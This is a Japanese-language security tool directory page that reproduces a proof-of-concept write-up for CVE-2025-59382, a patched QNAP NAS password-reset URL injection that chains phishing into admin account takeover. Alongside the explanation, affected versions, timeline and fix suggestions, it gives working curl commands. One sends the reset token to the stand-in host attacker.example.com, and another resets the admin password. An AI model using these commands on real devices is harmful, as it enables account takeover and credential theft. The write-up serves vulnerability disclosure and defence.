Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-59382-QNAP-Password-Reset-Account-Takeover — CVE-2025-59382の概念実証と技術解説書。QNAP NASにおける認証なしのパスワードリセットURLインジェクションにより、フィッシングからアカウント乗っ取りへの連鎖を可能にする脆弱性。 | Kitploit
ツール/GitHubGitHub/rat5ak/cve-2025-59382-qnap-password-reset-account-takeover
脆弱性分析エクスプロイトウェブアプリケーション悪用フィッシングペネトレーションテスト学習と教育
GitHubrat5ak/cve-2025-59382-qnap-password-reset-account-takeover

CVE-2025-59382-QNAP-Password-Reset-Account-Takeover

CVE-2025-59382の概念実証と技術解説書。QNAP NASにおける認証なしのパスワードリセットURLインジェクションにより、フィッシングからアカウント乗っ取りへの連鎖を可能にする脆弱性。

リポジトリを見る
1112ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-59382: QNAP パスワードリセットからアカウント乗っ取りへ

認証されていない攻撃者が制御するパスワードリセットURLが/cgi-bin/reset_password.cgiに存在します。

ラボでQuTScloud c5.2.4.3041 build 20250211に対してテストしました。QNAPは後にこれをアドバイザリQSA-26-10でCVE-2025-59382として公開しました。

概要

ローカルネットワークアクセス、または公開されたNAS管理インターフェースにアクセスできる認証されていない攻撃者は、/cgi-bin/reset_password.cgiのsend_mail関数のurlパラメータを操作することで、公式のQNAPパスワードリセットメールに任意のURLを注入できます。

被害者はNASから本物のQNAPパスワードリセットメールを受け取ります。攻撃者のURLはHTMLメール本文に直接埋め込まれ、QNAPはリセットトークン(rp)をそのURLに追加します。

これにより、パスワードリセットメールが見事なフィッシングからアカウント乗っ取りへのチェーンになります:

  1. 攻撃者が自身のURLでパスワードリセットをトリガー
  • NASが被害者に本物のQNAPリセットメールを送信
  • 被害者が攻撃者のURLをクリック
  • 攻撃者がrpリセットトークンを受信
  • 被害者がフィッシングページに検証コード(vc)を入力
  • 攻撃者が管理者パスワードをリセットしてログイン
  • 被害者の操作が必要ですが、攻撃者の認証は不要です。

    トリガー

    root@kitploit:~
    curl "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi?func=send_mail&user=admin&url=https://attacker.example.com/phish"
    

    NASは公式リセットメールを送信し、リセットトークンを攻撃者のURLに追加します。例:

    root@kitploit:~
    https://attacker.example.com/phish&u=admin&rp=e15a88a01fa81e58352b4b157607cb44
    

    検証コードも同じメールに表示されます。ラボでの証拠は次のようになりました:

    root@kitploit:~
    Your verification code is: 2FEA2B8B
    

    そのため、フィッシングページは被害者に検証コードを尋ねるだけで済みます。rpトークンはリンクがクリックされた時点で攻撃者のサーバーに届いています。

    パスワードリセット

    攻撃者がrpトークンとそれに関連するvc検証コードを入手したら、管理者パスワードをリセットできます:

    root@kitploit:~
    curl -X POST -d "func=reset_user_pw&user=admin&token=e15a88a01fa81e58352b4b157607cb44&vc=725E0F00&new_pw=UHduZWQyMDI2IQ==" \
      "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi"
    

    最終的なリセット呼び出しはPOSTである必要があります。被害者が偽のページに入力した検証コードはvc=<code>としてQNAPに送信されます。

    新しいパスワードはnew_pw内でbase64エンコードされています。PoCではこれで管理者パスワードを変更し、管理者としてログインするのに十分でした。

    なぜ機能するのか

    通常のフロントエンドフローは、次のようなローカルNAS URLを構築します:

    root@kitploit:~
    location.protocol + "//" + location.host + "/cgi-bin/main.html?cp=1"
    

    しかし、バックエンドはリセットURLを自身で生成する代わりに、クライアントから提供されたurlパラメータを信頼します。そしてその値を使用してメールリンクを構築し、次のものを追加します:

    root@kitploit:~
    &u=<user>&rp=<reset_token>
    

    urlとして渡されたものを単に信頼します。

    影響

    • 認証なしのリセットメールトリガー
    • 公式QNAPメールに攻撃者制御のURLが含まれる
    • 被害者がクリックするとリセットトークンが攻撃者に漏洩
    • 同じメールフローから検証コードをフィッシング可能
    • ラボチェーンで管理者パスワードのリセットと管理者ログインを実証

    信頼されたNASメールが配信を行っています。

    公開ステータス

    • CVE: CVE-2025-59382
    • アドバイザリ: QSA-26-10
    • QNAPアドバイザリ公開日: 2026-06-17
    • ベンダーCWE: CWE-472
    • ベンダーCVSS v4.0: 5.1 Medium
    • QNAPステータス: 解決済み

    QNAPは影響を受ける製品を次のようにリストしています:

    • QTS 5.2.7
    • QuTS hero h5.2.8
    • QuTS cloud c5.2.8
    • QVP 2.7.1

    QNAPがリストする修正バージョン:

    • QTS 5.2.9.3499
    • QuTS hero h5.2.9
    • QuTS cloud C5.2.9
    • QVP 2.8.0

    QNAPはこの問題を、リモートの攻撃者がパスワードリセットURLを変更し、被害者を攻撃者制御のリセットページに誘導して、認証情報を盗むものと説明しています。

    私自身のラボターゲットはQuTScloud c5.2.4.3041 build 20250211でした。ラボでの影響は、被害者の操作後の管理者パスワードリセットと管理者ログインでした。

    注意: 私はこれをラボで2026-05-09に再現し、2026-05-11にQNAPに送信しました。QNAPはこれをINTSI000-9029の重複としてマークしました。QNAPがCVE/アドバイザリを公開したため、POCを公開します。最初に発見したTim Coenに感謝します。

    修正方法の提案

    QNAPが使用した正確なパッチはわかりません。アドバイザリには修正されたバージョンのみがリストされています。

    適切な修正の私の推測は簡単です:ブラウザにリセットリンクの宛先をNASに指示させないことです。

    NASはそのリンクを自身で構築すべきです。QNAPがフローのためにurlパラメータをまだ必要とする場合、通常のNASリセットページのみを受け入れ、外部のものは拒否すべきです。

    また、メール本文に挿入されるものはすべてエンコードし、認証されていないリセットメールリクエストにはレート制限をかけるでしょう。

    参考文献

    • QNAPアドバイザリ: https://www.qnap.com/en/security-advisory/qsa-26-10
    • QNAP CVE JSON: https://www.qnap.com/uploads/security-advisories/QSA-26-10/CVE-2025-59382.json
    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59382
    • CVEレコード: https://www.cve.org/CVERecord?id=CVE-2025-59382

    免責事項: このエクスプロイトコードは教育および防御研究目的で公開されています。自分が所有していない、またはテストする明示的な許可がないシステムに対して使用しないでください。著者は誤用について責任を負いません。

    Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium · nadsec.online

    ツールをダウンロード